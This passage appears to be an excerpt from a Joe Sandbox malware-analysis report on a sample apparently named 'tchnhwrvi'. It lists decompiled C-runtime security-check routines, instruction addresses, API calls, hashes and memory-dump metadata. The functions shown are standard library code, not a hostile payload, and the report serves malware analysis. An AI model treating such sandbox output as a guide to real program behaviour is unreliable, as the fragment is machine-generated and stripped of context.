					 *((intOrPtr*)(0x41595c + _t16 * 0)) = 2;
					_t18 = 4;
					_t25 =  *0x415010; // 0xb51c3102
					 *((intOrPtr*)(_t31 + _t18 * 0 - 8)) = _t25;
					_t20 = 4;
					_t26 =  *0x415014; // 0x4ae3cefd
					 *((intOrPtr*)(_t31 + (_t20 << 0) - 8)) = _t26;
					return E00401F2A("HYA");
				} else {
					return __eax;
				}
			}




















                    0x004018d4
                    0x004018d4
                    0x004018d4
                    0x004018d4
                    0x004018d4
                    0x004018d4
                    0x004018da
                    0x00401f53
                    0x00401f5d
                    0x00401f65
                    0x00401f69
                    0x00401f6a
                    0x00401f6a
                    0x00401f6c
                    0x00401f71
                    0x00401f77
                    0x00401f7d
                    0x00401f83
                    0x00401f89
                    0x00401f8f
                    0x00401f96
                    0x00401f9d
                    0x00401fa4
                    0x00401fab
                    0x00401fb2
                    0x00401fb9
                    0x00401fba
                    0x00401fc3
                    0x00401fcb
                    0x00401fd3
                    0x00401fde
                    0x00401fe8
                    0x00401fed
                    0x00401ff2
                    0x00401ffc
                    0x00402006
                    0x00402012
                    0x00402016
                    0x00402022
                    0x00402026
                    0x0040202c
                    0x00402032
                    0x00402036
                    0x0040203c
                    0x0040204b
                    0x004018dc
                    0x004018dc
                    0x004018dc

                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00401F5D
                    • ___raise_securityfailure.LIBCMT ref: 00402045
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: FeaturePresentProcessor___raise_securityfailure
                    • String ID: HYA
                    • API String ID: 3761405300-3949630065
                    • Opcode ID: 2add615a2287014fb40954335aba8a78c14fe77b94684ac88e063d6ce4629430
                    • Instruction ID: 6cb4d069ac1d3707beaa45bb2dd9a615a7934397750866ae2a5b0aac751b91a7
                    • Opcode Fuzzy Hash: 2add615a2287014fb40954335aba8a78c14fe77b94684ac88e063d6ce4629430
                    • Instruction Fuzzy Hash: 662103B56A1A01DBD310DF55F9D6AC43BA0BF88394F50D23AE5098ABB0D3B45880CF4E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00283C79 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • DecodePointer.KERNEL32(?,00283CB2,00000000,00000000,00000000,00000000,00000000,0028A4F8,?,00286212,00000003,0028A51B,00000001,00000000,00000000), ref: 00283C84
                    • __invoke_watson.LIBCMT ref: 00283CA0
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: DecodePointer__invoke_watson
                    • String ID: .(
                    • API String ID: 4034010525-3375098775
                    • Opcode ID: 71ff6abe595ca3f92193aa33450ca7d47877ce67ba9e60f544bbc1de77c1a542
                    • Instruction ID: 3973f6b7878f0546d7fa801e38685c4ef15b4c8840f3f5cf40c168273c45d7e8
                    • Opcode Fuzzy Hash: 71ff6abe595ca3f92193aa33450ca7d47877ce67ba9e60f544bbc1de77c1a542
                    • Instruction Fuzzy Hash: 00E0EC3651010DBBCF426F65DC0A96A3F66FB44750B454821FD1491071D633C931EB90
                    Uniqueness

                    Uniqueness Score: -1.00%